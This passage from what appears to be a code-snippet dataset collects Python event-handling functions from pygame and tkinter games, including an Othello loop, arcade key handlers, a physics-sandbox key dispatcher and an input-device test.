can't move, then end the game.\n break\n\n movexy = None\n\n while movexy == None:\n # Keep looping until the player clicks on a valid space.\n # Determine which board data structure to use for display.\n if showHints:\n boardToDraw = get_board_with_valid_moves(mainBoard, playerTile)\n else:\n boardToDraw = mainBoard\n\n check_for_quit()\n for event in pygame.event.get(): # event handling loop\n if event.type == MOUSEBUTTONUP:\n # Handle mouse click events\n mousex, mousey = event.pos\n if newGameRect.collide_point((mousex, mousey)):\n # Start a new game\n return True\n elif hintsRect.collide_point((mousex, mousey)):\n # Toggle hints mode\n showHints = not showHints\n # movexy is set to a two-item tuple XY coordinate, or None value\n movexy = get_space_clicked(mousex, mousey)\n\n if movexy != None and not isValidMove(mainBoard, playerTile, movexy[0], movexy[1]):\n movexy = None\n\n # Draw the game board.\n draw_board(boardToDraw)\n draw_info(boardToDraw, playerTile, computer_tile, turn)\n\n # Draw the \"New Game\" and \"Hints\" buttons.\n DISPLAYSURF.blit(newGameSurf, newGameRect)\n DISPLAYSURF.blit(hintsSurf, hintsRect)\n\n MAINCLOCK.tick(FPS)\n pygame.display.update()\n\n # Make the move and end the turn.\n make_move(mainBoard, playerTile, movexy[0], movexy[1], True)\n if 
get_valid_moves(mainBoard, computer_tile) != []:\n # Only set for the computer's turn if it can make a move.\n turn = 'computer'\n else:\n # Computer's turn:\n if get_valid_moves(mainBoard, computer_tile) == []:\n # If it was set to be the computer's turn but\n # they can't move, then end the game.\n break\n\n # Draw the board.\n draw_board(mainBoard)\n draw_info(mainBoard, playerTile, computer_tile, turn)\n\n # Draw the \"New Game\" and \"Hints\" buttons.\n DISPLAYSURF.blit(newGameSurf, newGameRect)\n DISPLAYSURF.blit(hintsSurf, hintsRect)\n\n # Make it look like the computer is thinking by pausing a bit.\n pauseUntil = time.time() + random.randint(5, 15) * 0.1\n\n while time.time() < pauseUntil:\n pygame.display.update()\n\n # Make the move and end the turn.\n x, y = get_computer_move(mainBoard, computer_tile)\n make_move(mainBoard, computer_tile, x, y, True)\n\n if get_valid_moves(mainBoard, playerTile) != []:\n # Only set for the player's turn if they can make a move.\n turn = 'player'\n\n # Display the final score.\n draw_board(mainBoard)\n scores = get_score_of_board(mainBoard)\n # Determine the text of the message to display.\n\n if scores[playerTile] > scores[computer_tile]:\n text = 'You beat the computer by %s points! Congratulations!' % \\\n (scores[playerTile] - scores[computer_tile])\n elif scores[playerTile] < scores[computer_tile]:\n text = 'You lost. The computer beat you by %s points.' % \\\n (scores[computer_tile] - scores[playerTile])\n else:\n text = 'The game was a tie!'\n\n textSurf = FONT.render(text, True, TEXTCOLOR, TEXTBGCOLOR1)\n textRect = textSurf.get_rect()\n textRect.center = (int(WINDOWWIDTH / 2), int(WINDOWHEIGHT / 2))\n DISPLAYSURF.blit(textSurf, textRect)\n\n # Display the \"Play again?\" text with Yes and No buttons.\n text2Surf = BIGFONT.render('Play again?', True, TEXTCOLOR, TEXTBGCOLOR1)\n text2Rect = text2Surf.get_rect()\n text2Rect.center = (int(WINDOWWIDTH / 2), int(WINDOWHEIGHT / 2) + 50)\n\n # Make \"Yes\" button.\n yesSurf = BIGFONT.render('Yes', True, TEXTCOLOR, TEXTBGCOLOR1)\n yesRect = yesSurf.get_rect()\n yesRect.center = (int(WINDOWWIDTH / 2) - 60, int(WINDOWHEIGHT / 2) + 90)\n\n # Make \"No\" button.\n noSurf = BIGFONT.render('No', True, TEXTCOLOR, TEXTBGCOLOR1)\n noRect = noSurf.get_rect()\n noRect.center = (int(WINDOWWIDTH / 2) + 60, int(WINDOWHEIGHT / 2) + 90)\n\n while True:\n # Process events until the user clicks on Yes or No.\n check_for_quit()\n\n for event in pygame.event.get(): # event handling loop\n if event.type == MOUSEBUTTONUP:\n mousex, mousey = event.pos\n\n if yesRect.collide_point((mousex, mousey)):\n return True\n\n elif noRect.collide_point((mousex, mousey)):\n return False\n\n DISPLAYSURF.blit(textSurf, textRect)\n DISPLAYSURF.blit(text2Surf, text2Rect)\n DISPLAYSURF.blit(yesSurf, yesRect)\n DISPLAYSURF.blit(noSurf, noRect)\n\n pygame.display.update()\n MAINCLOCK.tick(FPS)", "def check_keydown_events(event, wof_settings, screen, hero, bombs):\n if event.key == pygame.K_RIGHT or event.key == pygame.K_d:\n hero.moving_right = True\n if event.key == pygame.K_LEFT or event.key == pygame.K_a:\n hero.moving_left = True\n if event.key == pygame.K_UP or event.key == pygame.K_w:\n hero.moving_up = True\n if event.key == pygame.K_DOWN or event.key == pygame.K_s:\n hero.moving_down = True\n elif event.key == pygame.K_SPACE:\n put_bomb(wof_settings,screen,hero,bombs)", "def check_events(si_settings, screen,stats,sb,play_button, ship,aliens, bullets):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n 
sys.exit()\n elif event.type == pygame.KEYDOWN:\n check_keydown_events(event, si_settings, screen, ship, bullets)\n elif event.type == pygame.KEYUP:\n check_keyup_events(event, ship)\n elif event.type == pygame.MOUSEBUTTONDOWN:\n mouse_x,mouse_y = pygame.mouse.get_pos()\n check_play_button(si_settings,screen,stats,sb,play_button,ship,aliens,bullets,mouse_x,mouse_y)", "def do_event(self, event):\n self.event = event\n self.event_type = event.type\n self.event_name = pygame.event.event_name(event.type)\n self.surf_list = []\n if event.type == QUIT:\n self.active = False\n \n elif event.type == KEYDOWN:\n self.event_key = event.key\n self.event_mod = event.mod\n self.event_unicode = event.unicode\n if event.key == K_ESCAPE:\n self.active = False\n elif event.key == K_RETURN:\n self.play(self)\n \n elif event.key in self.dirs:\n self.dir = np.array(self.dirs[event.key])\n self.pos += self.dir\n \n self.pos[0] = min(max(self.pos[0], 0), self.n-1)\n self.pos[1] = min(max(self.pos[1], 0), self.m-1)\n self.move(self)\n elif event.key in self.keys:\n self.keys[event.key](self)\n \n elif event.type == MOUSEMOTION:\n self.event_pos = event.pos\n self.event_rel = event.rel\n self.pos = self.get_index(*event.pos)\n if self.mouse_down:\n (x, y) = event.pos\n x -= self.dx//2\n y -= self.dy//2\n self.surf_list.append((self.cursor_img, (x, y)))\n \n elif event.type == MOUSEBUTTONDOWN:\n self.mouse_down = True\n (i, j) = self.get_index(*event.pos)\n t = self.T[i, j]\n if t != 0 and len(self.images)>0:\n self.cursor_img = self.images[t]\n self.T[i, j] = 0\n self.cursor_val = t\n \n elif event.type == MOUSEBUTTONUP:\n self.mouse_down = False\n (i, j) = self.get_index(*event.pos)\n self.pos = [i, j] \n t = self.T[i, j]\n if t == 0 and len(self.images) > 0:\n self.T[i, j] = self.cursor_val\n self.play(self)", "def switch_pattern(self):\n event = self.event_deque.popleft()\n event.reset()\n self.event_deque.append(event)\n self.last_switch = pygame.time.get_ticks()", "def get_event(self, event):\n\n if event.type == pg.KEYDOWN:\n if event.key == pg.K_RETURN:\n print(self.game.current_room_no)\n if event.key == pg.K_BACKSPACE:\n print(self.game.room.room_no_list)\n if event.key == pg.K_a:\n self.is_moving_left = True \n self.move_left()\n if event.key == pg.K_d:\n self.is_moving_right = True \n self.move_right()\n if event.key == pg.K_w:\n self.is_moving_up = True\n self.move_up() \n if event.key == pg.K_s:\n self.is_moving_down = True\n self.move_down() \n if event.type == pg.KEYUP:\n if event.key == pg.K_a:\n if self.is_moving_right == True:\n self.is_moving_left = False \n self.move_right()\n else:\n self.is_moving_left = False \n self.stopX()\n if event.key == pg.K_d:\n if self.is_moving_left == True:\n self.is_moving_right = False\n self.move_left() \n else:\n self.is_moving_right = False \n self.stopX()\n if event.key == pg.K_w:\n if self.is_moving_down == True:\n self.is_moving_up = False \n self.move_down()\n else:\n self.is_moving_up = False \n self.stopY()\n if event.key == pg.K_s:\n if self.is_moving_up == True:\n self.is_moving_down = False \n self.move_up()\n else:\n self.is_moving_down = False \n self.stopY()\n\n if event.type == pg.MOUSEBUTTONDOWN and event.button == 1:\n self.is_shooting = True\n elif event.type == pg.MOUSEBUTTONUP and event.button == 1:\n self.is_shooting = False", "def play(self, event):\n\n # locate second column and row when player click on a square\n colrow_tuple = self.board.find_coords_of_selected_sq(event)\n\n # save the col and row as variable\n corner_two_col, 
corner_two_row = colrow_tuple[0], colrow_tuple[1]\n\n # calculations to get the key to help locate specific square on\n # the unused dictionary of squares left to play\n col_fl, row_fl = self.board.floor_of_row_col(event.x, event.y)\n rowcol_key = self.board.convert_to_key(col_fl, row_fl)\n\n try:\n self.unused_squares_dict[rowcol_key]\n except KeyError:\n return\n\n if self.player1_turn == True:\n self.add_to_player_sq(rowcol_key, self.player1.selected_sq)\n\n # delete from game unused dictionary of set\n self.delete_used_sq(rowcol_key)\n\n self.board.color_selected_sq(event,\n corner_two_col,\n corner_two_row,\n self.player1.color)\n\n # check game for 3 conditions: a tie, player1 win, or player2 win\n self.check_for_winner(self.player1.selected_sq, self.player1.name)\n\n # switch turn\n self.player1_turn = False\n\n else: # player2's turn\n self.board.color_selected_sq(event,\n corner_two_col,\n corner_two_row,\n self.player2.color)\n\n self.add_to_player_sq(rowcol_key, self.player2.selected_sq)\n self.delete_used_sq(rowcol_key)\n self.check_for_winner(self.player2.selected_sq, self.player2.name)\n self.player1_turn = True", "def check_events(wof_settings, screen, hero, bombs):\n for event in pygame.event.get():\n\n if event.type == pygame.QUIT or (event.type == pygame.KEYUP and event.key == pygame.K_ESCAPE):\n wof_settings.running = False \n terminate()\n elif (event.type == pygame.KEYUP and event.key == pygame.K_b):\n wof_settings.running = False\n return 'back'\n elif (event.type == pygame.KEYUP and event.key == pygame.K_n):\n wof_settings.running = False\n return 'next'\n elif (event.type == pygame.KEYUP and event.key == pygame.K_BACKSPACE):\n wof_settings.running = False\n return 'replay'\n elif event.type == pygame.KEYDOWN:\n check_keydown_events(event, wof_settings, screen, hero, bombs)\n # control the Hero movements\n elif event.type == pygame.KEYUP:\n check_keyup_events(event, hero)", "def events(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.running = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n self.set_selected(self.mouse_on_grid())\n if self.get_selected() is not None and event.type == pygame.KEYDOWN:\n self.event_seletect_moved(event)\n self.event_cell_update(event)", "def check_keydown_events(event,ai_settings,screen,ship,bullets,stats,aliens,sb):\n\t\n\tif event.key == pygame.K_RIGHT:\n\t\t# Mova a espaçonave para a direita\n\t\n\t\tship.set_moving_right(True)\n\t\n\telif event.key == pygame.K_LEFT:\n\t\t# Move a espaçonave para a esquerda\n\n\t\tship.set_moving_left(True)\n\n\telif event.key == pygame.K_SPACE:\n\n\t\tfire_bullet(ai_settings,screen,ship,bullets)\n\n\telif event.key == pygame.K_q:\n\t\tstats.file.stored_high_score(stats.high_score)\n\t\tsys.exit()\n\n\telif event.key == pygame.K_p:\n\t\tstart_game(ai_settings,screen,stats,ship,aliens,bullets,sb)", "def action_key_press(key, cur_key_type, cur_key, draw, phys, msg, timer, board, force):\n\n\n # delete any old mouse joints prior to dealing with the next keypress\n if key != \"m\" and msg.message != \"Mouse Move\" and cur_key_type == 0:\n for jn in phys.world.joints:\n if type(jn) is b2MouseJoint:\n phys.world.DestroyJoint(jn)\n\n if not key is None and key != \"\":\n if platform == \"linux\" or platform == \"linux2\":\n window = get_active_window_title()\n elif platform == \"win32\":\n window = gw.getActiveWindow().title\n\n if not \"Board\" in window and not \"Toolbar\" in window:\n pass\n else:\n if key == 255:\n pass\n\n elif key == \"r\" and cur_key_type == 0:\n # 
RESET SCREEN\n if sg.popup_yes_no(\"Are you sure you want to reset?\") == \"Yes\":\n draw.reset()\n msg = Messenger(phys.options[\"screen\"][\"fps\"], board)\n msg.set_message(\"Reset\")\n board.reset = True\n\n elif key == \"q\" and cur_key_type == 0:\n # QUIT\n msg.set_message(\"Quit\")\n val = sg.popup_yes_no(\"Are you sure you want to quit?\")\n if val == \"Yes\":\n board.run = False\n\n\n elif key == \"z\" and cur_key_type == 0:\n # SPAWN\n msg.set_message(\"Spawn\")\n phys.create_block()\n\n elif key == \"u\" and cur_key_type == 0:\n # draw delete blocks\n draw.reset()\n options = {\"Remove Joints\": SelectType.select}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"x\" and cur_key_type == 0:\n # draw delete blocks\n draw.reset()\n options = {\"Delete\": SelectType.select}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"p\" and cur_key_type == 0:\n # draw polygon\n draw.reset()\n # msg.set = {\"Dynamic Block\": draw.get_draw_type()}\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Dynamic Block\")\n\n elif key == \"g\" and cur_key_type == 0:\n # draw ground\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Static Block\")\n # options = {\"Static Block\": draw.get_draw_type()}\n\n # cur_key = msg.auto_set(options, key, force)\n\n elif key == \"i\" and cur_key_type == 0:\n # draw terrain\n\n draw.reset()\n options = {\"Generate Terrain\": SelectType.null}\n cur_key = msg.auto_set(options, key, force)\n\n draw, phys, board = create_terrain(draw, phys, board=board)\n\n\n elif key == \"f\" and cur_key_type == 0:\n # draw fragments or select\n draw.reset()\n options = {\n \"Fragment Select\": SelectType.select} # \"Fragment Poly\": SelectType.draw, \"Frament Rectangle\": SelectType.rectangle,\n # \"Frament Select\": SelectType.select}\n cur_key = msg.auto_set(options, key, force)\n\n\n elif key == \"1\" and cur_key_type == 0:\n # fire polygon\n draw.reset()\n options = {\"Create\": SelectType.select_point, \"Fire Block\": SelectType.vector_direction}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"4\" and cur_key_type == 0:\n # select\n # draw ground\n draw.reset()\n options = {\"Joint Update\": SelectType.select}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \";\" and cur_key_type == 0:\n # select\n # draw ground\n draw.reset()\n options = {\"Player Update\": SelectType.select}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"2\" and cur_key_type == 0:\n # Mouse Move\n draw.reset()\n options = {\"Rotate\": SelectType.player_select}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"m\" and cur_key_type == 0:\n # Mouse Move\n draw.reset()\n options = {\"Mouse Move\": SelectType.select, \"Normal Move\": SelectType.null, \"Joint Move\": SelectType.null,\n \"Clone Move\": SelectType.null}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"t\" and cur_key_type == 0:\n # Mouse Move\n draw.reset()\n options = {\"Transform\": SelectType.player_select}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"e\" and cur_key_type == 0:\n # draw ropes\n if sg.popup_yes_no(\"Are you sure you want to kill all blocks?\") == \"Yes\":\n draw.reset()\n phys.kill_all(static=False)\n msg.set_message(\"Remove Blocks\")\n cur_key = \"e\"\n\n elif key == \"v\" and cur_key_type == 0:\n # draw ropes\n draw.reset()\n msg.set_message(\"Set Spawn\")\n cur_key = \"v\"\n\n elif key == \"h\" and cur_key_type == 0:\n # draw fragment ALL players\n # 
cur_key = \"h\"\n msg.set_message(\"Frag All\")\n draw.reset()\n blocks = [bl for bl in phys.block_list if not bl.static is True and not bl.is_terrain is True]\n phys.fractal_block(blocks, create=False, board=board)\n\n elif key == \"k\" and cur_key_type == 0:\n # draw splitter sensor\n draw.reset()\n\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Force\")\n\n\n elif key == \"l\" and cur_key_type == 0:\n # draw splitter sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Splitter\")\n\n\n elif key == \"/\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Impulse\")\n\n\n elif key == \"'\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Goal\")\n\n elif key == \"{\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Spawner\")\n\n\n elif key == \"~\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Motor Switch\")\n\n elif key == \"&\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Water\")\n\n\n elif key == \"^\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Low Gravity\")\n\n\n elif key == \"#\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Gravity Switch\")\n\n elif key == \")\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Center\")\n\n elif key == \"%\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Sticky\")\n\n elif key == \"£\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Enlarger\")\n\n\n elif key == \"$\" and cur_key_type == 0:\n # draw booster sensor\n draw.reset()\n cur_key = key + str(draw.get_draw_type().value)\n msg.set_message(\"Shrinker\")\n\n\n elif key == \"0\" and cur_key_type == 0:\n # pause physics\n phys.force_draw_all = not phys.force_draw_all\n options = {\"Draw All\": SelectType.null, \"Draw Set\": SelectType.null}\n cur_key = msg.auto_set(options, key, force)\n\n\n\n elif key == \"o\" and cur_key_type == 0:\n # pause physics\n draw.reset()\n phys.pause = not phys.pause\n msg.set_message(\"Pause\" + (\" On\" if phys.pause is True else \" Off\"))\n cur_key = \"o\"\n\n elif key == \"*\" and cur_key_type == 0:\n # PICKLE BOARD\n name, blurb = save_gui()\n if not name is None:\n pickler(timer, phys, draw, board, msg, name, blurb)\n msg.set_message(\"State Saved\")\n cur_key = \"*\"\n draw.reset()\n\n elif key == \"-\":\n # LOAD BOARD\n\n timer, phys, draw, board, msg = load_gui(timer, phys, draw, board, msg, persistant=False)\n config = phys.config\n\n elif key == \"5\" and cur_key_type == 0:\n\n load_options()\n phys.change_config(board=board)\n\n elif key == \"6\" and cur_key_type == 0:\n\n board, phys, msg = update_background(board, phys, msg)\n\n\n elif key == \"j\" and cur_key_type == 0:\n # draw joints\n draw.reset()\n options = {\"Merge Blocks\": SelectType.select,\n 
\"Distance Joint\": SelectType.straight_join, \"Rope Joint\": SelectType.straight_join,\n \"Prismatic Joint\": SelectType.straight_join,\n \"Electric\": SelectType.line_join,\n \"Chain\": SelectType.line_join2,\n \"Weld Joint\": SelectType.straight_join, \"Wheel Joint\": SelectType.circle,\n \"Rotation Joint\": SelectType.rotation_select, \"Pulley\": SelectType.d_straight_join}\n\n cur_key = msg.auto_set(options, key, force)\n\n\n\n elif key == \"tab\":\n # Tab key press, this switches to move mode\n if cur_key_type == 0:\n cur_key_type = 1\n msg.set_message(\"Drawing Mode Enabled\")\n draw.reset()\n else:\n cur_key_type = 0\n msg.set_message(\"Create Mode Enabled\")\n draw.reset()\n\n\n # Drawing mode buttons\n\n elif key == \"`\" and cur_key_type == 1:\n # Mouse Move\n draw.reset()\n options = {\"Change Keys\": SelectType.select}\n cur_key = msg.auto_set(options, key, force)\n\n\n elif key == \"1\" and cur_key_type == 1:\n # Mouse Move\n draw.reset()\n options = {\"Screen Move\": SelectType.null}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"2\" and cur_key_type == 1:\n # Mouse Move\n draw.reset()\n options = {\"Center Clicked\": SelectType.null}\n cur_key = msg.auto_set(options, key, force)\n\n\n elif key == \"]\" and cur_key_type == 1:\n # draw polygon\n draw.reset()\n options = {\"Fire Bullet\": SelectType.bullet_direction}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"[\" and cur_key_type == 1:\n # draw polygon\n draw.reset()\n options = {\"Choose Player\": SelectType.null}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"3\" and cur_key_type == 1:\n # draw polygon\n\n draw.reset()\n options = {\"Motor Forwards\": SelectType.vector_direction}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"4\" and cur_key_type == 1:\n # draw polygon\n\n draw.reset()\n options = {\"Motor Backwards\": SelectType.vector_direction}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"9\" and cur_key_type == 1:\n # draw polygon\n\n draw.reset()\n cur_key = key + str(SelectType.vector_direction.value)\n msg.set_message(\"Force\")\n\n elif key == \"0\" and cur_key_type == 1:\n # draw polygon\n\n draw.reset()\n options = {\"Relative Force\": SelectType.vector_direction}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"5\" and cur_key_type == 1:\n # draw polygon\n\n draw.reset()\n options = {\"Rotate CCW\": SelectType.vector_direction}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"6\" and cur_key_type == 1:\n # draw polygon\n\n draw.reset()\n options = {\"Rotate CW\": SelectType.vector_direction}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"7\" and cur_key_type == 1:\n # draw polygon\n\n draw.reset()\n cur_key = key + str(SelectType.vector_direction.value)\n msg.set_message(\"Impulse\")\n\n\n elif key == \"8\" and cur_key_type == 1:\n # draw polygon\n\n draw.reset()\n options = {\"Relative Impulse\": SelectType.vector_direction}\n cur_key = msg.auto_set(options, key, force)\n\n elif key == \"!\" and cur_key_type == 1:\n \"\"\"\n Used to attach an relative impulse to a block\n \"\"\"\n board.translation = np.array([0, 0])\n\n # do move keypresses:\n if cur_key_type == 1:\n phys.do_keypress(key)\n\n return cur_key_type, cur_key, draw, phys, msg, timer, board", "def _check_events(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n self._check_keyDown_events(event)\n elif event.type == pygame.KEYUP:\n 
self._check_keyUP_events(event)\n elif event.type == pygame.MOUSEBUTTONDOWN:\n mouse_pos = pygame.mouse.get_pos()\n self._check_play_button(mouse_pos)", "def check_events_welcome_screen(ai_settings,grid, screen, buttons,screen_status, button_status, card_database_filter, user,action, player2):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n sys.exit()\n\n elif event.type == pygame.MOUSEBUTTONDOWN:\n\n # If settings window is on\n if button_status.welcome_screen_settings_display == True:\n # Turn sound on\n if Rect(510, 333, 40, 40).collidepoint(pygame.mouse.get_pos()):\n ai_settings.sound_indicator = True\n # Turn sound off\n elif Rect(560, 333, 40, 40).collidepoint(pygame.mouse.get_pos()):\n ai_settings.sound_indicator = False\n # Turn music on\n elif Rect(510, 403, 40, 40).collidepoint(pygame.mouse.get_pos()):\n ai_settings.music_indicator = True\n # Turn music off\n elif Rect(560, 403, 40, 40).collidepoint(pygame.mouse.get_pos()):\n ai_settings.music_indicator = False\n\n # Change Theme\n elif Rect(510, 470, 140, 50).collidepoint(pygame.mouse.get_pos()):\n ai_settings.theme_indicator = 'Lith Harbor'\n change_bg_music('Lith Harbor')\n\n elif Rect(670, 470, 140, 50).collidepoint(pygame.mouse.get_pos()):\n ai_settings.theme_indicator = 'Leafre'\n change_bg_music('Leafre')\n\n elif Rect(510, 540, 140, 50).collidepoint(pygame.mouse.get_pos()):\n ai_settings.theme_indicator = 'Pantheon'\n change_bg_music('Pantheon')\n\n elif Rect(670, 540, 140, 50).collidepoint(pygame.mouse.get_pos()):\n ai_settings.theme_indicator = 'Ellinia'\n change_bg_music('Ellinia')\n\n # change AI speeding\n elif Rect(550, 620, 80, 50).collidepoint(pygame.mouse.get_pos()):\n ai_settings.AI_speed_indicator = '1000'\n\n elif Rect(650, 620, 80, 50).collidepoint(pygame.mouse.get_pos()):\n ai_settings.AI_speed_indicator = '2000'\n\n elif Rect(750, 620, 80, 50).collidepoint(pygame.mouse.get_pos()):\n ai_settings.AI_speed_indicator = '3000'\n\n # Quit settings window\n elif Rect(870, 300, 30, 30).collidepoint(pygame.mouse.get_pos()):\n button_status.welcome_screen_settings_display = False\n\n elif button_status.rules_display == True:\n # When we click on '>'\n if Rect(640, 37, 20, 20).collidepoint(pygame.mouse.get_pos()):\n if int(button_status.rules_page_id) < 4:\n button_status.rules_page_id = str(int(button_status.rules_page_id)+1)\n else:\n pass\n # When we click on '<'\n elif Rect(540, 37, 20, 20).collidepoint(pygame.mouse.get_pos()):\n if int(button_status.rules_page_id) > 1:\n button_status.rules_page_id = str(int(button_status.rules_page_id)-1)\n else:\n pass\n\n elif Rect(975, 35, 25, 25).collidepoint(pygame.mouse.get_pos()):\n button_status.rules_display = False\n\n else:\n # Click on single player\n if Rect(402, 269, 396, 62).collidepoint(pygame.mouse.get_pos()):\n screen_status.welcome_screen_display = False\n screen_status.prepare_screen_display = True\n if user.name == '':\n button_status.text_input_box_display = True\n else:\n pass\n # Click on multiplayer\n elif Rect(434, 370, 333, 61).collidepoint(pygame.mouse.get_pos()):\n screen_status.welcome_screen_display = False\n screen_status.lobby_screen_display = True\n player2.identity = 'pvp'\n if user.name == '':\n button_status.text_input_box_display = True\n else:\n pass\n #enter_as_network_client(ai_settings,grid, screen, buttons,screen_status, button_status, card_database_filter, user,action, player2)\n # Click on settings\n elif Rect(474, 469, 253, 
62).collidepoint(pygame.mouse.get_pos()):\n button_status.welcome_screen_settings_display = True\n\n # Click on rules\n elif Rect(517, 570, 167, 61).collidepoint(pygame.mouse.get_pos()):\n button_status.rules_display = True\n\n # click on exit\n elif Rect(541, 670, 119, 61).collidepoint(pygame.mouse.get_pos()):\n sys.exit()", "def _check_event(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_q:\n sys.exit()\n elif event.key == pygame.K_SPACE:\n self.waiting = not self.waiting\n elif event.type == pygame.MOUSEBUTTONDOWN:\n if self.waiting:\n x,y = pygame.mouse.get_pos()\n cell_addr_y = int(y/self.cell_width)\n cell_addr_x = int(x/self.cell_width)\n self.cells[cell_addr_y][cell_addr_x].update()", "def handle_keyboard_event(self, event, **kwargs):\n ok, collision = False, None\n key_pressed = pygame.key.get_pressed()\n if key_pressed[pygame.K_x]:\n sys.exit(0)\n if not self.select_from_menu:\n ok, collision = self._handle_keyboard_grid_event(key_pressed)\n else:\n self._handle_keyboard_menu_event(key_pressed)\n if key_pressed[pygame.K_RETURN]:\n event = self.menu.select_highlighted(source=self.battle_source, target=self.battle_target)\n self.menu.visible = False\n self.select_from_menu = False\n if event:\n kwargs[GHandler.EBUCKET].append(event)\n if not ok and collision:\n self.menu.visible = True\n self.select_from_menu = True\n self.battle_source = self.actor\n self.battle_target = collision.solid_object\n\n super(GameScene, self).handle_keyboard_event(event, **kwargs)", "def test_040_mouse_keyboard(self):\n self.allow_service('qubes.InputMouse')\n self.allow_service('qubes.InputKeyboard')\n self.setUpDevice(mouse_events + keyboard_events)\n dev_name = '{}: {}'.format(\n self.vm.name if hasattr(self, 'vm') else 'remote',\n 'Test input device')\n self.find_device_and_start_listener('pointer:' + dev_name)\n self.emit_event('REL_X', 1)\n self.emit_event('REL_X', 1)\n self.emit_event('REL_Y', 1)\n self.emit_event('REL_Y', 1)\n self.emit_click('BTN_LEFT')\n\n self.assertEvent(['RawMotion', '0', {'0': '1.00', '1': '0.00'}])\n self.assertEvent(['RawMotion', '0', {'0': '1.00', '1': '0.00'}])\n self.assertEvent(['RawMotion', '0', {'1': '1.00', '0': '0.00'}])\n self.assertEvent(['RawMotion', '0', {'1': '1.00', '0': '0.00'}])\n self.assertEvent(['RawButtonPress', '1', {}])\n self.assertEvent(['RawButtonRelease', '1', {}])\n\n self.find_device_and_start_listener('keyboard:' + dev_name)\n\n self.emit_click('KEY_A')\n self.emit_click('KEY_B')\n self.emit_click('KEY_C')\n self.emit_click('KEY_D')\n for _ in range(4):\n self.emit_click('KEY_BACKSPACE')\n\n for key in ('38', '56', '54', '40'):\n self.assertEvent(['RawKeyPress', key, {}])\n self.assertEvent(['RawKeyRelease', key, {}])\n for _ in range(4):\n self.assertEvent(['RawKeyPress', '22', {}])\n self.assertEvent(['RawKeyRelease', '22', {}])", "def _play(self, func):\n\n func()\n print('\\nhuman movement:\\n')\n print(self._board)\n\n while self._board.possible() != []:\n self._board.move_computer()\n print('\\ncomputer movement:\\n')\n print(self._board)\n if self._board.check_win():\n print('\\nwinner is computer')\n return\n\n func()\n print('\\nhuman movement:\\n')\n print(self._board)\n if self._board.check_win():\n print('\\nwinner is human')\n return\n print('\\nwinner is friendship :)')", "def bindHotkeys(self):\r\n self.root.bind(\"s\",self.pause)\r\n self.root.bind(\"p\",self.play)\r\n self.root.bind(\"x\",self.stop)\r\n 
self.root.bind(\"<Right>\",lambda event, t=10: self.skipFor(event,t=t))\r\n self.root.bind(\"<Left>\",lambda event, t=-10: self.skipFor(event,t=t))\r\n self.bindDPHotkeys()", "def move_draught(event):\n global red_turn\n if(red_turn == False):\n return\n draught = board.find_withtag(CURRENT)[0]\n board.coords(draught,event.x-click_offset[0],event.y-click_offset[1],event.x-click_offset[0]+board_divisions,event.y-click_offset[1]+board_divisions)", "def click(self, event):\n x = self.ptgrid(event.x)\n y = self.ptgrid(event.y)\n \n # x = loc[0]\n # y = loc[1]\n\n # if self.gamestate == self.STATE_TITLE_SCREEN:\n # self.new_board()\n # self.gamestate = FIRST_PLAYER\n\n\n #duplication /!\\\n if (self.board[y][x] == self.EMPTY and self.p2pGame.isReady):\n if(self.p2pGame.playerTurn == 'X' and self.player == 1):\n self.new_move(x, y, self.player)\n\n if self.has_won(self.player):\n self.gamestate = self.STATE_GAME_OVER\n if self.player == 1:\n self.gameover_screen('X Gagne')\n data = \"--W:X\"\n else:\n self.gameover_screen('O Gagne')\n data = \"--W:O\"\n self.p2pGame.playerTurn = 'X'\n 